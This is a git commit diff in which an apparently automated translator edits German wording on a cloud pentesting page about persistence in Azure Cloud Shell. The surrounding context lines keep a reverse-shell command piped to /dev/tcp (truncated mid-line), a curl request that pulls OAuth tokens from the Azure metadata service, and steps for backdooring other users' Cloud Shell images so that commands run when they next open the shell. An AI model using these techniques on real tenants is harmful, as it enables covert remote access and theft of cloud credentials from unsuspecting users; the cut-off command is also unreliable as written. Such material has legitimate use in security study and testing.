Translated ['src/pentesting-cloud/azure-security/az-persistence/az-cloud

This commit is contained in:
Translator
2025-05-14 13:51:43 +00:00
parent 8cac93fbc6
commit caa73625e2

View File

@@ -15,7 +15,7 @@ echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CC
```
Diese Hintertür kann Befehle sogar 5 Minuten nach dem Abschluss der Cloud-Shell durch den Benutzer ausführen.
Zusätzlich die Metadaten-Dienste von Azure nach Instanzdetails und Tokens abfragen:
Zusätzlich wird der Azure-Metadatenservice nach Instanzdetails und Tokens abgefragt:
```bash
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
```
@@ -23,7 +23,7 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a
Wenn ein Angreifer Bilder anderer Benutzer in einem Storage Account findet, auf den er Schreib- und Lesezugriff hat, kann er das Bild herunterladen, **eine Bash- und PS-Hintertür hinzufügen** und es zurück in den Storage Account hochladen, sodass beim nächsten Zugriff des Benutzers auf die Shell die **Befehle automatisch ausgeführt werden**.
- **Bild herunterladen, Hintertür hinzufügen und hochladen:**
- **Download, Hintertür und Hochladen des Bildes:**
```bash
# Download image
mkdir /tmp/phishing_img